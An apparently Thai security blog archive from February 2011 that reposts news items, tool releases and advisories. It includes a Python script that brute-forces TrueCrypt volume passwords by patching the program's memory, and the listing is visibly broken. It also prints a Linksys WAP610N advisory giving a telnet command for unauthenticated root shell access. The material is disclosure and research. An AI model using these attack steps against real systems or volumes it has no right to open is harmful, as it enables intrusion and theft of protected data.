Feb 11, 2011

TrueCrypt Self-Bruteforce

In the last weeks I was playing with many of the challengues of Yashira (If you don't know it, I recommend you to take a look over it as it is one of the biggest spanish web of wargames AFIK) and one of the challenge was to crack a TrueCrypt file. I knew about the existence of that application but I never used it... until now. So I decided to download TrueCrypt and play around with the program to get familiar with it. After read the documentation and some reviews I realize that it is a very secure piece of software that implements many high level features so I knew I will not be easy, at least in theory.
I start to search in internet for some tools than can help me to bruteforce the file but I couldn't find any. I remember one page propose one solution: Create an script and launch the truecrypt aplication with some command line options and test if was possible to open it. I tried to do it but it was really slow so I start to search for another options until I found a way to use truecrypt as a self-bruteforce: Instead of launch truecrypt everytime with a different password I made a script in python with the winappdbg python module that acts as a loader and change/test the password in the memory space of truecrypt itself.
Requirementes and notes:
  • python 2.6.4 (2.6.x should also work)
  • winappdbg-1.3.win32
  • Use the truecrypt application provided in the attached file or against a Keepass version 6.3a
  • It only works agains volumes without keyfiles
TrueCrypt Self-Bruteforce Python Code
# TrueCrypt Self-Bruteforce v0.1
# Based in Truecrypt version 6.3a
# Programmed by Miguel Febres
# mafebresv at q-protex.com
# http://www.q-protex.com

# Performance: 2 words per second (Core Duo 2.2GHZ), DeviceIoControl is slow 

from winappdbg import Debug
from time import strftime
import time

r_eax = 0
r_ecx = 0
r_edx = 0


def action_2( event ):
    global word
    global counter
    global debug
    global ptrBuffer
    global WORD_SIZE
    aThread = event.get_thread()
    aProcess = event.get_process()
    if aProcess.peek(ptrBuffer, 1) == '\x00':
        print 'Counter: ' + repr(counter) + ' - Correct: ' + word
        debug.dont_break_at(aProcess.get_pid() , 0x0043F93E)
        #if (counter%1000)==0:
        print 'Counter: ' + repr(counter) + ' - Incorrect: ' + word

        if counter< len(words):
            aProcess.poke(ptrBuffer, '\x00') #flag 1
            word = word.replace("\n","")
            word = word[0:WORD_SIZE-1]
            #word = word.lower() #optional
            word = word.ljust(WORD_SIZE,"\0")
            aProcess.poke_uint(ptrBuffer + 0x218, WORD_SIZE)
            aProcess.poke(ptrBuffer + 0x21C, word)
            aThread.set_register("Eip", 0x0043F90F)

def action_1( event ):
    global debug
    global ptrBuffer
    aThread = event.get_thread()
    aProcess = event.get_process()
    ptrBuffer = aThread.get_register("Ecx")
    debug.dont_break_at(aProcess.get_pid() , 0x0043F929)

def action_0( event ):
    global debug
    aThread = event.get_thread()
    aProcess = event.get_process()
    r_eax = aThread.get_register("Eax")
    r_ecx = aThread.get_register("Ecx")
    r_edx = aThread.get_register("Edx")
    debug.dont_break_at(aProcess.get_pid() , 0x0043F90F)

words = open('dic.txt', "r").readlines() #lengthall
print "[+] Words Loaded:",len(words)

    debug = Debug()
    # Start a new process for debugging
    p = debug.execv( ['TrueCrypt.exe', '/v', 'test.tc', '/lx', '/p', "".ljust(WORD_SIZE) ,'/q', '/s'])

    debug.break_at(p.get_pid() , 0x0043F90F, action_0) #save state
    debug.break_at(p.get_pid() , 0x0043F929, action_1) #save buffer addres
    debug.break_at(p.get_pid() , 0x0043F93E, action_2) #check result, restore state, change eip

    # Wait for the debugee to finish
    t1 = time.clock() 


print 'Finished in ' + repr(time.clock() - t1) + ' seconds!'

Of course, to made this script possible first I debug keepass and after a while I found how to change the password in memory and force the program to test it again.

Source: http://www.q-protex.com/software/password-recovery/truecrypt-self-bruteforce

Download this file (TrueCrypt-SB v0.1.rar)TrueCrypt-SB v0.1.rar[TrueCrypt Self-Bruteforce v0.1]1732 Kb    

Web Exploitation Framework

Several web application security centric frameworks have come and gone that were intended to address this challenge. The goal of Web Exploitation Framework (wXf) is to take the experience of using these tools, the perceived shortcomings and build something that is easy to use, install and extend.

Web Exploitation Framework (“wXf”) is written in Ruby and was originally an idea as a module for Rapid 7’s Metasploit but the idea quickly outgrew a network exploitation framework. Instead, we designed a core that focuses on the web standards along with exploits & payloads designed specifically for defeating web application protections. wXf maintains somewhat of the look and feel of Metasploit but the code is entirely different. Our goal is to have a security professional familiar with the Metasploit framework using wXf in under 10 minutes.

Download: https://github.com/WebExploitationFramework

More info: Web Exploitation Framework with Ken Johnson, Fishnet Security and Chris Gates, No Affiliation.

Source: http://security-sh3ll.blogspot.com/2011/02/web-exploitation-framework.html

Google Adds 1-Time Passwords to Gmail, Apps

Stolen or easily-guessed passwords have long been the weakest link in security, leaving many Webmail accounts subject to hijacking by identity thieves, spammers and extortionist. To combat this threat on its platform, Google is announcing that starting today, users of Google’s Gmail service and other applications will have the option to beef up the security around these accounts by adding one-time pass codes sent to their mobile or land line phones.

For several months, Google has been offering this option to business customers and to “hundreds of thousands” of regular users who lost control over their accounts due to password theft, said Nishit Shah, product Manager for Google Security. Today, Google will begin rolling this feature out to all users, although it may be available to all users immediately, Shah said.

“It’s an extra step, but it’s one that significantly improves the security of your Google Account because it requires the powerful combination of both something you know—your username and password—and something that only you should have—your phone,” Shah wrote in a blog post published today. “A hacker would need access to both of these factors to gain access to your account. If you like, you can always choose a ‘Remember verification for this computer for 30 days’ option, and you won’t need to re-enter a code for another 30 days. You can also set up one-time application-specific passwords to sign in to your account from non-browser based applications that are designed to only ask for a password, and cannot prompt for the code.”

I set up the 2-step verification process for my Gmail account, and found the process to be quick and painless, if a little involved. I choose to set it up to call my Skype line and read the code aloud, and the call came in three seconds after I hit the submit button. The setup wizard then gave me 10 backup codes to use in cases when for whatever reason I don’t have access to my Skype account. Another setup page offered the ability to add a secondary backup phone to send the code via SMS/text message, or automated voice message.

A final page warned that “Google has detected that you need to create application-specific passwords” to use applications like mobile Gmail, desktop Picassa or AdWords editor. I skipped this step because I don’t use those services, but was confused by the prompt that said “Your two-step verification settings have not changed.” When I went back again and ran through all the setup options, Google’s system did not prompt me to add the application specific codes, but instead gave a page with a button to “turn on 2-step verification”, which signed me out of my Gmail and then called me with the one-time code. At the corresponding login page, the option to “Remember this computer for 30 days,” was pre-checked.

This feature is undoubtedly a useful tool for securing accounts; the challenge will be making users aware of the option. For now, the option to enable it is tucked inside of the “user settings” panel in Gmail, an area into which many users probably never venture. And to be sure, many users probably will end up locking themselves out of their accounts, despite the availability of multiple means of obtaining a secondary code that Google has offered. On top of that, threats to mobile devices or cleverly-designed social engineering attacks could still trick users into giving away the codes.

Still, the 2-step verification process is more robust than many banks are offering their customers for online authentication these days. Given the epidemic of commercial and consumer e-banking account takeovers aided by password theft, it would be nice to see financial institutions taking a cue from Google’s offering.

Source: http://krebsonsecurity.com/2011/02/google-adds-1-time-passwords-to-gmail-apps/

UPDATE: Seccubus v1.5.4!

Seccubus version 1.5.4.
Tool to automatically fire regular security scans with Nessus. Compare results of the current scan with the previous scan and report on the delta in a web interface. Main objective of the tool is to make repeated scans more efficient.
This release fixes an OpenVAS-Client 3.x compatibility issue.
Download Seccubus v1.5.3 (Seccubus-1.5.3.tar.gz) here

Source: http://www.pentestit.com/2011/02/10/update-seccubus-v154/

VIDEO: How to steal passwords from a locked iPhone

VIDEO: How to steal passwords from a locked iPhone

German researchers say that they have found a way to steal passwords stored on a locked Apple iPhone in just six minutes. And they can do it it without cracking the iPhone's passcode.
Researchers from the Fraunhofer Institute Secure Information Technology (Fraunhofer SIT) say that the attack targets Apple's password management system - known as the keychain.
Here's a YouTube video where the German researchers demonstrate their attack in action:

The only hint of a silver lining is that the attack can not be done remotely - the attackers need physical access to your iPhone to steal information.
But if the attacker only needs to have his hands on your iPhone for six minutes, how much of a comfort is this really? Don't forget, it's not unusual for people to lose their mobile phones or leave them unattended on their desk while they pop off to the coffee machine.
Attack on iPhone revealing passwords
According to material published by Fraunhover Insitute SIT, sensitive password information can be extracted from a user's iPhone without needing to know the passcode.
Passwords accessible through iPhone attack
The researchers claim that all iPhone and iPad devices containing the latest firmware are vulnerable. At a time when Apple and its fans are pushing hard for more companies to bring iPhones into the enterprise there will undoubtedly be concerns if these vulnerability claims are found to be true.
All eyes must now turn to Cupertino to see what Apple has to say about this.

Source: http://nakedsecurity.sophos.com/2011/02/10/video-how-to-steal-passwords-locked-iphone/

Feb 10, 2011

Valentine's Day scam spreads virally on Facebook

With Valentine's Day approaching on February 14th, scammers on Facebook are ramping up their efforts to take advantage of the traditional day of love to make a quick buck out of unsuspecting users.
Facebook users are being tricked into clicking on messages that they believe their online friends have posted, how to put a heart or love poem on their sweetheart's wall.
Valentine's Day scam message on Facebook
Is there a girl/boy you really like? why not show him/her via Facebook! give him/her a Love Poem and a Love Heart straight to his/her wall! Get Started Here: [LINK]
Sophos has identified a rogue Facebook application called Valentine's Day which is responsible for the messages, but it is possible that the scammers could have created others which use similarly love-themed messages.
If you make the mistake of clicking on the link you are taken to a splash screen which displays a teaser, claiming that the application will "generate a random poem and send to one or many friends you select".
According to the splash screen, the application has 220,673 monthly users - which may make you think that there's nothing to be suspicious about.
Valentine's Day scam splash screen
However, the third-party Valentine's Day Facebook application is a rogue app, trying to trick you into agreeing to give it the ability to post status messages to your wall as well as gather information about you including your name, photograph, gender and information about your friends.
Rogue Valentine's Day Facebook app
Clicking on "Allow" is a desperately bad idea, but plenty of Facebook users already have. What they don't realise is that application craftily and instantly posts the message advertising the rogue app to your Facebook wall, hoping to draw your online friends into the money-making scheme.
Because the scammers are not really interested in your budding romance. They just want to make money. And they do that by tricking you into taking an online survey disguised as a "Facebook Anti-Spam Verification" dialog box.
Valentine's Day survey scam on Facebook
The scammers, of course, earn commission every time a survey is completed. This is a trick which they are using time and time again on Facebook, earning themselves cash by duping unsuspecting users into taking their surveys. Some surveys even ask you for your mobile phone number, and then sign you up for an expensive premium rate service.
As Valentine's Day draws closer we can expect to see more and more scammers and cybercriminals attempt to exploit it - and not just on Facebook, in the past hackers have taken advantage of the international day of love to spread malicious ecards and trick users into running dangerous code on their computers. Make sure you keep your feet on the ground about your computer's security.
If you have been hit by scams like this on Facebook, and are struggling to clean-up your profile, here's a YouTube video I made which describes what steps you need to take:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Source: http://nakedsecurity.sophos.com/2011/02/10/valentines-day-scam-spreads-virally-on-facebook/

Howto add permanent static routes in Ubuntu

วิธีการเพิ่ม Static Routes ใน Ubuntu ครับ

Static routing is the term used to refer to the manual method used to set up routing. An administrator enters routes into the router using configuration commands. This method has the advantage of being predictable, and simple to set up. It is easy to manage in small networks but does not scale well.
Advantages of Static Routes
  • Easy to configure
  • No routing protocol overhead
Disadvantages of Static Routes
  • Network changes require manual reconfiguration
  • Network outages cannot be automatically routed around
  • Does not scale well in large networks.
Add a Static route using “route” command
route add [-net|-host] <IP/Net> netmask <Mask> gw <Gateway IP> dev <Int>X
route add -net netmask gw dev eth0
route add -host netmask gw dev eth0
This adds the route immediatly to the Kernel IP routing table. To confirm the route has been successfully, simply type the “route” command with no arguements:
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface * U 0 0 0 eth0
localnet * U 0 0 0 eth0 * U 0 0 0 eth0 * U 0 0 0 eth0
default UG 0 0 0 eth0
netstat -rn
to print the Kernel IP Routing table.
To keep the Static Route persistent or you want to add the route entries to the network script files (not using the route command) then all you need to do is to edit the file
and the static routes in the following format:
up route add [-net|-host] <host/net>/<mask> gw <host/IP> dev <Interface>
up route add -net gw dev eth1
And the file will like the following
sudo cat /etc/network/interfaces
The output should show something like this
sudo cat /etc/network/interfaces
The output should show something like this
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0 eth1
iface eth0 inet static
# dns-* options are implemented by the resolvconf package, if installed
iface eth1 inet static
# static route
up route add -net gw dev eth1
The above has 2 Ethernet interfaces and the static route is added to the interface eth1.
For the change to /etc/network/interface to take effect. please restart the “networking” service as follows:
sudo /etc/init.d/networking restart
NOTE: If you added the route already using the “route” then there is no need to restart the networking service because, the next time server is restarted this takes effect.

Metasploit Framework 3.5.2 Released!

On February 1st, Eduardo Prado of Secumania notified us of a privilege escalation vulnerability on multi-user Windows installations of the Metasploit Framework. The problem was due to inherited permissions that allowed an unprivileged user to write files in the Metasploit installation directory. Today we are releasing version 3.5.2 to fix this vulnerability. The new installers fix this issue through two changes: first, we've moved the default installation to %ProgramFiles%, which does not normally allow non-admin write access; second, we explicitly remove any inherited permissions for the "Users" and "Authenticated Users" groups. For users who prefer not to re-install Metasploit, you can use the following commands to fix the problem:

Vista and newer:

icacls c:\framework /inheritance:d /t
icacls c:\framework /remove *S-1-5-32-545 /t
icacls c:\framework /remove *S-1-5-11 /t

For systems older than Vista, you will need the xcacls.vbs tool available from Microsoft.

xcacls.vbs c:\framework /E /R SID#S-1-5-32-545 /T

Note that the "Authenticated Users" group doesn't exist before Vista, so you only need to remove "Users".

This issue is mitigated by the fact that it only affects multi-user Windows installations with low-privileged accounts, a scenario we believe to be a small percentage of our users.

In addition to fixing this vulnerability, the 3.5.2 release fixes over 50 bugs and contains 39 new modules. Also included in this release is a revamped WMAP courtesy of Efrain Torres, improvements to Meterpreter's railgun extension thanks to chao-mu, and a fledgling version of Post Exploitation modules (a more powerful replacement for Meterpreter scripts). Raphael Mudge's Armitage was also integrated in this release. Post modules are still in their infancy and will likely be much improved in the next release. 

Source: http://blog.metasploit.com/2011/02/metasploit-framework-352-released.html

Microsoft Patch Tuesday Roundup - February 2011

Update Patch ของ Microsoft ที่ผ่านมามีการ fix MS011-04 ซึ่งเป็นช่องโหว่ที่พบใน IIS FTP โดย IIS FTP ที่ยังมีให้บริการเยอะอยู่นั้น  ปรากฎว่า Thailand ของเราดันติด 1-5 ซะด้วย -*- (อันนี้เป็นข้อเสียนะครับไม่ใช่ข้อดี)

And the race is on to apply patches to the Microsoft Windows systems in your environment! One of the bulletins this month, MS011-04, fixes remotely exploitable issues in the IIS FTP service. To me, FTP falls in the same category as Telnet, which is "You should be using SSH instead". Despite the lack of security that FTP offers, it still appears to be wildly popular decades later. I performed some searches using "SHODAN", "The Computer Search Engine", which scours the Internet looking for open ports, services and banners. I told it to find systems with port 21 (FTP) open and got the following results:
  • United States: 27,355
  • China: 15,341
  • India: 11,122
  • Egypt: 10,476
  • Thailand: 10,068

I then told it to find the systems known to be running SSH (port 22):
  • United States: 21,484
  • Germany: 2,458
  • France: 904
  • United Kingdom: 893
  • Japan: 751
Could it be that FTP is more popular than SSH? Wow, not only do we have patches to apply, but it seems we've got some protocols to replace/update as well. Just in case you were wondering, here are the results for Telnet (port 23):
  • United States: 363,931
  • Korea, Republic of: 340,240
  • China: 225,079
  • Brazil: 99,653
  • Italy: 58,918
My guess is that SHODAN is doing more intensive scanning for Telnet than SSH or FTP protocols. Even if the above numbers are just samples of even small to medium numbers of systems, we've still got a lot of systems that are using these older protocols. Why does this matter? First, protocols that send credentials and data in clear text have a very limited use, if any, for transmitting information across the network as they do not offer confidentiality or integrity of the data. Second, the fewer services you run and expose to the Internet, the better off you are with respects to patching. You may be reading this and thinking, "Yes, but I'm not running these services". My question to you is, “When was the last time you checked?” There are obviously more than a few systems out there still running FTP and Telnet.
To further aid in your efforts to evaluate the dangers of the vulnerabilities addressed by Microsoft’s Patch Tuesday, Tenable's Research team has published plugins for each of the security bulletins issued this month:


Source: http://blog.tenablesecurity.com/2011/02/microsoft-patch-tuesday-roundup-february-2011.html

CSRF Protection Bypass in Ruby on Rails

บทความเพิ่มเติมเกี่ยวกับการป้องกัน CSRF ของ Ruby On Rails และวิธีการ update patch ครับ

There is a vulnerability in Ruby on Rails which could allow an attacker to circumvent the CSRF protection provided. This vulnerability has been assigned the CVE Identifier CVE-2011-0447.
  • Versions Affected: 2.1.0 and above
  • Not affected: Applications which don’t use the built in CSRF protection.
  • Fixed Versions: 3.0.4, 2.3.11


Certain combinations of browser plugins and HTTP redirects can be used to trick the user’s browser into making cross-domain requests which include arbitrary HTTP headers specified by the attacker. An attacker can utilise this to spoof ajax and API requests and bypass the built in CSRF protection and successfully attack an application. All users running an affected release should upgrade or apply the patches immediately.


The 3.0.4 and 2.3.11 releases are available at the normal locations.

Upgrade Process

There are two major changes in this fix, the behaviour when CSRF protection fails has changed and the token will now be required for all non-GET requests.
After applying this patch failed CSRF requests will no longer generate HTTP 500 errors, instead the session will be reset. Users can override this behaviour by overriding handle_unverified_request in their own controllers.
Users must still take care that users cannot be auto logged in via non-session data. For example, an application using filters to implement ‘remember me’ functionality must either remove those cookies in their handle_unverified_request handlers or ensure that the remember me code is only executed on GET requests. A custom handler which removes the remember_me cookie would look like:
def handle_unverified_request
   super # call the default behaviour which resets the session
   cookies.delete(:remember_me) # remove the auto login cookie so the fraudulent request is rejected.
There are two steps to ensuring that your application sends the CSRF Token with every ajax request. Providing the token in a meta tag, then ensuring your javascript reads those values and provides them with each request. The first step involves you including the csrf_meta_tag helper somewhere in your application’s layout. Rails 3 applications likely already include this helper, however it has now been backported to the 2.3.x series. An example of its use would be something like this in application.html.erb:
<%= javascript_include_tag :defaults %>
<%= csrf_meta_tag %>
In addition to altering the templates, an application’s javascript must be changed to send the token with Ajax requests. Rails 3 applications can just update their rails.js file using rake rails:update, 2.x applications which don’t use the built-in ajax view helpers will need to add a framework-specific snippet to their application.js. Examples of those snippets are available:


There are no feasible workarounds for this vulnerability.


To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format, 3-0-csrf.patch includes two changesets, the others consist of a single changeset.
Given the severity of the problem we are also providing backported fixes to the 2.2 and 2.1 series. There will be no gem releases for these versions but the stable branches in git will be updated.
Please note that only the 2.3.x and 3.0.x series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee continued security fixes indefinitely.


Thanks to Felix Gröbert of the Google Security Team for reporting the vulnerability to us and working with us to ensure that the fix didn’t introduce any new issues. Thanks also to the Shopify development team for their assistance in verifying the fix and the upgrade process.

Source: http://weblog.rubyonrails.org/2011/2/8/csrf-protection-bypass-in-ruby-on-rails

The Most Common and Dangerous Passwords [infographic]

The Most Common and Dangerous Passwords [infographic]

Click the image for a bigger view:


Source: http://thenextweb.com/shareables/2011/02/06/how-to-avoid-the-most-common-and-dangerous-passwords-infographic/

Cross Origin Header Forging for CSRF Attacks

มีการ update ของ Django และ Ruby On Rails เพื่อป้องการที่จะทำให้เกิด CSRF ผ่าน Header ซึ่งใช้วิธีการกันผ่าน XHR request ซึ่งจะทำการเพิ่ม X-Requested-With Header เข้าไป โดยการ add header เข้าไปแบบอัตโนมัติขณะทำการเรียกใช้งาน XHR request ซึ่งจะทำให้ hacker ไม่สามารถสร้างหรือปลอม header ได้

Django and ruby on rails just released security updates (here and here) to address an attack that would allow CSRF through forged headers.  Previously these two frameworks provided a CSRF defense for XHR requests that was based on the presence of the X-Requested-With header. The idea was simple, the header was automatically added during normal use of the XHR request by the user and an attacker was unable to spoof or forge a header in the context of a cross domain setting (e.g. CSRF attack).  We discussed this a few months back and the consensus was that this approach was safe.

Apparently that has all changed.  The details are currently very limited (or I just haven't found them).  This is what is provided at the django and ruby on rails security update pages:
Recently, engineers at Google made members of the Ruby on Rails development team aware of a combination of browser plugins and redirects which can allow an attacker to provide custom HTTP headers on a request to any website. This can allow a forged request to appear to be an AJAX request, thereby defeating CSRF protection which trusts the same-origin nature of AJAX requests.
Michael Koziarski of the Rails team brought this to our attention, and we were able to produce a proof-of-concept demonstrating the same vulnerability in Django's CSRF handling.
I'm very curious to find out more. Is a proof of concept available? What browser plugins are required for this attack? The potential exposure must be large because both frameworks have released a "backwards-incompatible" patch.
This is technically backwards-incompatible, but the security risks have been judged to outweigh the compatibility concerns in this case.

Source: http://michael-coates.blogspot.com/2011/02/cross-origin-header-forging-for-csrf.html?spref=tw

Linksys WAP610N Unauthenticated Access With Root Privileges

พบช่องโหว่ใน Linksys WAP610N ที่ทำให้สามารถเข้าถึง Shell ได้แบบ Root Privileges คำแนะนำตอนนี้สำหรับผมคือเปลี่ยน Router หรือไม่ก็ปิด Port 1111 ซะ

Secure Network - Security Research Advisory

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2011
Advisory number: SN-2010-08

*** SUMMARY ***

Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.

Unauthenticated remote textual administration console has been found that allow an attacker to run system command as root user.


telnet <access-point IP> 1111

Command> system id
Output>  uid=0(root) gid=0(root)

List of console's command:


*** EXPLOIT ***

Attackers may exploit these issues through a common telnet client as explained above.


No patch is available.


Put access points on separate wired network and filter network traffic to/from 1111 tcp port.


Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.

This advisory is copyright 2009 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.

Phone: +39 02 24 12 67 88

Feb 9, 2011

Hackers selling $25 toolkit to create malicious Facebook apps

ข่าว Hacker ขาย toolkit ที่ใช้ในการสร้าง malicious Facebook ในราคา 25$ ครับ


Malicious hackers are selling a $25 toolkit to anyone interested in creating and distributing dangerous Facebook applications
Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues. He is currently security evangelist at Kaspersky Lab, an anti-malware company with operations around the globe. He is taking a leadership role in developing the company's online community initiative around secure content management technologies.
Prior to joining Kaspersky Lab, Ryan was Editor-at-Large/Security at eWEEK, leading the magazine's and Web site's coverage of Internet and computer security issues and managing the popular SecurityWatch blog, covering the daily threats, vulnerabilities and IT security technologies. He also covered IT security, hacker attacks and secure content management topics for Jupiter Media's internetnetnews.com.
Daniel Kennedy leads initiatives in policy and operational security management, directs strategy on risk assessment and certification, and is head of business continuity planning and disaster recovery at Praetorian Security Group, LLC.
Prior to Praetorian Security Group, Daniel was the Global Head of Information Security at D.B. Zwirn & Co. where he managed the firm's information security program. He was specifically responsible for the development, implementation, and maintenance of the firm's information security policies. He also managed security metrics reporting, the security awareness and education program, security incident response, security audit, and developing the firm's security technology strategy. In this role he worked closely with the firm's CIO, COO, head of compliance, head of legal, head of infrastructure, head of client services, and overseas IT managers.
Prior to D.B. Zwirn, Daniel was Vice President and Program Manager for the application security program at Pershing LLC, a division of the Bank of New York. Daniel's responsibilities included management of the firm's application security program, coordination of application vulnerability assessments and penetration testing, application security training, documentation of secure coding guidelines, and development of the firm's application security SDLC. He was the primary liaison for application security concerns between application development and teams such as the Information Security Office, Internal Audit, Information Risk Management (IRM), and the business teams. He served on several firm committees including the Infrastructure Security Workgroup, Security Architecture, and chartered and chaired the firm's Application Security Council, an interdisciplinary group consisting of application developers and information security subject matter experts.
His previous positions at Pershing included development management and systems' engineering positions building the firm's web applications for facilitating online brokerage. He has also been employed at Donaldson, Lufkin, & Jenrette Inc. in a technology analyst role for the Treasury area.
Daniel holds a Masters of Science degree in Information Systems from Stevens Institute of Technology, a Masters of Science in Information Assurance from Norwich University, and a Bachelors of Science in Information Management and Technology from Syracuse University. He is certified as a CEH (Certified Ethical Hacker) from the EC-Council, a CISSP, and has a NASD Series 7 license.
You can also follow him on Twitter as well as the blog Praetorian Prefect.

Malicious hackers are selling a $25 toolkit to anyone interested in creating and distributing dangerous Facebook applications, according to researchers at Websense Security Labs.

The do-it-yourself toolkit offers a template for spreading malware, directing users to click-fraud accounts and for pushing Facebook users to bogus surveys to hijack personal information.

This commoditization of Facebook malware is further confirmation that social networks are a happy hunting ground for cyber-criminals looking to hijack personal data for use in identity theft attacks.
“The buyer doesn’t have to have development experience with Facebook, he/she just needs to follow the accompanying instructions and a working viral Facebook application is at their disposal,” the company explained.
Websense researchers have linked the toolkit, called TinieApp, to the recent “Profile Creeps” and “Creeper Tracker” rogue app attack that appeared on Facebook over the last week.
“This phenomenon of template Facebook applications like Tinie app shows how the spamming culture is consolidating more and more around Facebook, adapting to the platform and increasing what we call Web spam,” Websense added.
Kick off your day with ZDNet's daily e-mail newsletter. It's the freshest tech news and opinion, served hot. Get it.

Source: http://www.zdnet.com/blog/security/hackers-selling-25-toolkit-to-create-malicious-facebook-apps/8104